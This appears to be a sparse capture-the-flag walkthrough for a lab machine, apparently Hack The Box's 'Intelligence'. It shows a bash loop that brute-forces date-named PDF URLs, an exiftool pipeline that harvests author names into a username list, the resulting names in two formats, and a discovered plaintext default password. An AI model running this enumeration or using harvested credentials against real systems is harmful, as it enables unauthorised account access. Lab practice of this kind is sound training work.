80
Last updated
Was this helpful?
Last updated
Was this helpful?
http://10.10.10.248/documents/2020-01-01-upload.pdf
wget http://10.10.10.248/documents/2020-01-01-upload.pdf
exiftool 2020-01-01-upload.pdf
william.lee
http://10.10.10.248/documents/2020-01-02-upload.pdf
scott.scott
#!/bin/bash
for month in {01..12}; do
for day in {01..31}; do
wget http://10.10.10.248/documents/2020-$month-$day-upload.pdf
done
done
exiftool 2020-* | grep -i creator | awk -F: '{print $2}' | sed 's/^[ \t]*//' | sort -u > users.txt
chmod +x autoget.sh
./autoget.sh
Anita.Roberts
Brian.Baker
Brian.Morris
Daniel.Shelton
Danny.Matthews
Darryl.Harris
David.Mcbride
David.Reed
David.Wilson
Ian.Duncan
Jason.Patterson
Jason.Wright
Jennifer.Thomas
Jessica.Moody
John.Coleman
Jose.Williams
Kaitlyn.Zimmerman
Kelly.Long
Nicole.Brock
Richard.Williams
Samuel.Richardson
Scott.Scott
Stephanie.Young
Teresa.Williamson
Thomas.Hall
Thomas.Valenzuela
Tiffany.Molina
Travis.Evans
Veronica.Patel
William.Lee
Aroberts
Bbaker
Bmorris
Dshelton
Dmatthews
Dharris
Dmcbride
Dreed
Dwilson
Iduncan
Jpatterson
Jwright
Jthomas
Jmoody
Jcoleman
Jwilliams
Kzimmerman
Klong
Nbrock
Rwilliams
Srichardson
Sscott
Syoung
Twilliamson
Thall
Tvalenzuela
Tmolina
Tevans
Vpatel
Wlee
for i in $(ls 2020-*); do open $i; done
NewIntelligenceCorpUser9876